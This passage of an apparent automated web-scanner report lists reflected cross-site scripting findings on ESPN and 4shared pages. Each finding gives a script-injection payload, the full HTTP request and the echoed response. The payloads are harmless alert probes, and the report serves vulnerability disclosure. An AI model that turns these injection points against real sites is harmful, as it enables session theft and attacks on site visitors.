Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Sat, 26 Feb 2011 02:22:52 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 26 Feb 2011 02:22:52 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN16
Cache-Expires: Sat, 26 Feb 2011 02:23:52 GMT
Content-Length: 21817
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Game Recap - ESPN C
...[SNIP]...
<a href="http://sports.espn.go.com/ncbbf0f9"><script>alert(1)</script>e1494246220/boxscore?gameId=310542507">
...[SNIP]...

1.183. http://sports.espn.go.com/espn/js/uniloginInLineReplace [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /espn/js/uniloginInLineReplace

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload d4bef<script>alert(1)</script>37fa09da2a3 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /espn/js/uniloginInLineReplace?cb=runOmnitureIndependentlyd4bef<script>alert(1)</script>37fa09da2a3 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:08:02 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:08:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN18
Cache-Expires: Wed, 23 Feb 2011 23:18:02 GMT
Content-Length: 324
Connection: close
X-UA-Compatible: IE=EmulateIE7


if(""==""){
   runOmnitureIndependentlyd4bef<script>alert(1)</script>37fa09da2a3(null, null, null, null, null, null, null);
}
else{
   var insiderTokenCheck = "0";
   if(insiderTokenCheck == "0") insiderTokenCheck = "0";
   runOmnitureIndependentlyd4bef<script>
...[SNIP]...

1.184. http://sports.espn.go.com/golf/columns/story [columnist parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /golf/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload 79c9f--><script>alert(1)</script>32e5dd3314b was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /golf/columns/story?columnist=sobel_jason79c9f--><script>alert(1)</script>32e5dd3314b&page=CiL HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=15
Date: Wed, 23 Feb 2011 23:07:54 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:07:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN05
Cache-Expires: Wed, 23 Feb 2011 23:10:09 GMT
Content-Length: 41287
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<!--/golf/columns/story?columnist=sobel_jason79c9f--><script>alert(1)</script>32e5dd3314b&page=CiL-->
...[SNIP]...

1.185. http://sports.espn.go.com/mlb/columns/story [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /mlb/columns/story

Issue detail

The value of the id request parameter is copied into an HTML comment. The payload a24de--><script>alert(1)</script>8a656193ce9 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /mlb/columns/story?columnist=crasnick_jerry&id=6095672\a24de--><script>alert(1)</script>8a656193ce9 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=15
Date: Sat, 26 Feb 2011 02:21:47 GMT
Content-Type: text/html
Last-Modified: Sat, 26 Feb 2011 02:21:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN16
Cache-Expires: Sat, 26 Feb 2011 02:22:47 GMT
Content-Length: 59814
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<!--/mlb/columns/story?columnist=crasnick_jerry&id=6095672\a24de--><script>alert(1)</script>8a656193ce9-->
...[SNIP]...

1.186. http://sports.espn.go.com/ncaa/columns/story [columnist parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /ncaa/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload f2e24--><script>alert(1)</script>7793b931b30 was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /ncaa/columns/story?columnist=forde_patf2e24--><script>alert(1)</script>7793b931b30&id=6150934 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:07:40 GMT
Content-Type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Wed, 23 Feb 2011 23:14:00 GMT
Content-Length: 50181
Cache-Control: no-cache
Pragma: no-cache
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<!--/ncaa/columns/story?columnist=forde_patf2e24--><script>alert(1)</script>7793b931b30&id=6150934-->
...[SNIP]...

1.187. http://sports.espn.go.com/ncaa/columns/story [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /ncaa/columns/story

Issue detail

The value of the id request parameter is copied into an HTML comment. The payload e22e0--><script>alert(1)</script>51559d0ec4 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /ncaa/columns/story?columnist=forde_pat&id=6150934e22e0--><script>alert(1)</script>51559d0ec4 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:07:42 GMT
Content-Type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Cache-Expires: Wed, 23 Feb 2011 23:14:02 GMT
Content-Length: 48840
Cache-Control: no-cache
Pragma: no-cache
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<!--/ncaa/columns/story?columnist=forde_pat&id=6150934e22e0--><script>alert(1)</script>51559d0ec4-->
...[SNIP]...

1.188. http://sports.espn.go.com/new-york/mlb/columns/story [columnist parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /new-york/mlb/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload ab783--><script>alert(1)</script>13cf7f13f38 was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /new-york/mlb/columns/story?columnist=marchand_andrewab783--><script>alert(1)</script>13cf7f13f38&id=6148017 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Wed, 23 Feb 2011 23:07:25 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:07:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN35
Cache-Expires: Wed, 23 Feb 2011 23:08:25 GMT
Content-Length: 48771
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Spring Training 201
...[SNIP]...
<!--url:/newyork/mlb/columns/story?columnist=marchand_andrewab783--><script>alert(1)</script>13cf7f13f38&id=6148017-->
...[SNIP]...

1.189. http://sports.espn.go.com/new-york/nba/columns/story [columnist parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /new-york/nba/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload a78ab--><script>alert(1)</script>30f7ceccaa0 was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /new-york/nba/columns/story?columnist=smith_stephena78ab--><script>alert(1)</script>30f7ceccaa0&id=6151461 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Wed, 23 Feb 2011 23:07:02 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:07:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN03
Cache-Expires: Wed, 23 Feb 2011 23:08:02 GMT
Content-Length: 49403
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The New Jersey Nets
...[SNIP]...
<!--url:/newyork/nba/columns/story?columnist=smith_stephena78ab--><script>alert(1)</script>30f7ceccaa0&id=6151461-->
...[SNIP]...

1.190. http://sports.espn.go.com/new-york/ncb/columns/story [columnist parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /new-york/ncb/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload 96982--><script>alert(1)</script>2e8bd08d9cb was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /new-york/ncb/columns/story?columnist=darcy_kieran96982--><script>alert(1)</script>2e8bd08d9cb&id=6149055 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Wed, 23 Feb 2011 23:07:07 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:07:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN06
Cache-Expires: Wed, 23 Feb 2011 23:08:07 GMT
Content-Length: 45822
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>St. John's is back
...[SNIP]...
<!--url:/newyork/ncb/columns/story?columnist=darcy_kieran96982--><script>alert(1)</script>2e8bd08d9cb&id=6149055-->
...[SNIP]...

1.191. http://sports.espn.go.com/new-york/nfl/columns/story [columnist parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /new-york/nfl/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload 7fb3d--><script>alert(1)</script>49cb1de33c was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /new-york/nfl/columns/story?columnist=cimini_rich7fb3d--><script>alert(1)</script>49cb1de33c&id=6124996 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Wed, 23 Feb 2011 23:07:29 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:07:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN15
Cache-Expires: Wed, 23 Feb 2011 23:08:29 GMT
Content-Length: 41612
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>New York Jets decis
...[SNIP]...
<!--url:/newyork/nfl/columns/story?columnist=cimini_rich7fb3d--><script>alert(1)</script>49cb1de33c&id=6124996-->
...[SNIP]...

1.192. http://sports.espn.go.com/new-york/teams/recap [sport parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /new-york/teams/recap

Issue detail

The value of the sport request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0be4"><script>alert(1)</script>bd9314bed95 was submitted in the sport parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york/teams/recap?gameId=310530164&sport=ncbc0be4"><script>alert(1)</script>bd9314bed95 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Wed, 23 Feb 2011 23:07:36 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:07:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN09
Cache-Expires: Wed, 23 Feb 2011 23:08:36 GMT
Content-Length: 20995
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Game Recap - ESPN N
...[SNIP]...
<a href="http://sports.espn.go.com/ncbc0be4"><script>alert(1)</script>bd9314bed95/boxscore?gameId=310530164">
...[SNIP]...

1.193. http://static.4shared.com/bundles/css/630963420/css/openid.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/630963420/css/openid.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eba06"-alert(1)-"0dae7da8be1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

